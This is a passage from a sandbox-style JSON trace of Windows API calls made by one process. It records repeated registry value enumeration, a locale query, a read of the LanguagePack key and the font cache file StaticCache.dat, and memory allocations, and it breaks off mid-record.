"NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "42" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 761 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "42" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 762 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "43" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 763 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "43" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 764 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "44" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 765 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "44" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 766 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "45" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 767 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "45" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 768 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "46" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 769 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "46" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 770 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "47" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 771 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "47" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 772 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "48" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 773 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "48" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 774 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "49" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 775 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "49" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 776 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "50" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 777 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "50" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 778 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "51" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 779 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "51" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 780 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "52" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 781 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "52" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 782 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "53" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 783 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "53" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 784 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "54" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 785 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "54" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 786 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "55" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 787 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "55" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 788 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "56" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 789 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "56" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 790 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "57" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 791 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "57" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 792 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "58" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 793 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "58" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 794 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "59" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 795 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "59" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 796 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "60" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 797 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "60" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 798 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "61" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 799 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "61" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 800 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "62" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 801 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "62" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 802 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "63" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 803 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "63" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 804 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "64" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 805 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "64" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 806 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "65" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 807 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "65" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 808 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "66" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 809 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "66" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 810 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "67" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 811 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "67" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 812 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtEnumerateValueKey", "status": false, "return": "0xffffffff8000001a", "pretty_return": "NO_MORE_ENTRIES", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "Index", "value": "68" }, { "name": "KeyValueInformationClass", "value": "1" } ], "repeated": 0, "id": 813 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000280" } ], "repeated": 0, "id": 814 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x07222000" }, { "name": "RegionSize", "value": "0x00006000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 815 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 816 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 817 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x00000101", "pretty_value": "KEY_QUERY_VALUE|KEY_WOW64_64KEY" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0" } ], "repeated": 0, "id": 818 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "ValueName", "value": "Disable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable" } ], "repeated": 0, "id": 819 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "ValueName", "value": "DataFilePath" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Windows\\Fonts\\staticcache.dat" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath" } ], "repeated": 0, "id": 820 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000280" } ], "repeated": 0, "id": 821 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Fonts\\staticcache.dat" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 822 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000280" }, { "name": "HandleName", "value": "C:\\Windows\\Fonts\\StaticCache.dat" }, { "name": "FileInformationClass", "value": "5", "pretty_value": "FileStandardInformation" }, { "name": "FileInformation", "value": "\\x00\\x00&\\x01\\x00\\x00\\x00\\x00\\x00\\x00&\\x01\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 823 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000280" }, { "name": "HandleName", "value": "C:\\Windows\\Fonts\\StaticCache.dat" }, { "name": "Buffer", "value": "\\x1a\\x83W\\xa5\\x02\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00$\\x01\\x00\\x00$)\\x00\\x00\\x00\\x00\\x02\\x00\\xbe\\x02\\x00\\x00<\\x00\\x00\\x00$!\\x00\\x00L)\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00" }, { "name": "Length", "value": "60" } ], "repeated": 0, "id": 824 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000284" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000280" } ], "repeated": 0, "id": 825 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000284" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0b9c0000" }, { "name": "SectionOffset", "value": "0x0019dcb0" }, { "name": "ViewSize", "value": "0x01260000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 826 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x07228000" }, { "name": "RegionSize", "value": "0x00015000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 827 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0723d000" }, { "name": "RegionSize", "value": "0x00008000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 828 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 829 }, { "timestamp": "2025-03-02 21:32:33,404", "thread_id": "7632", "caller": "0x0042d360", "parentcaller": "0x0042d52e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" 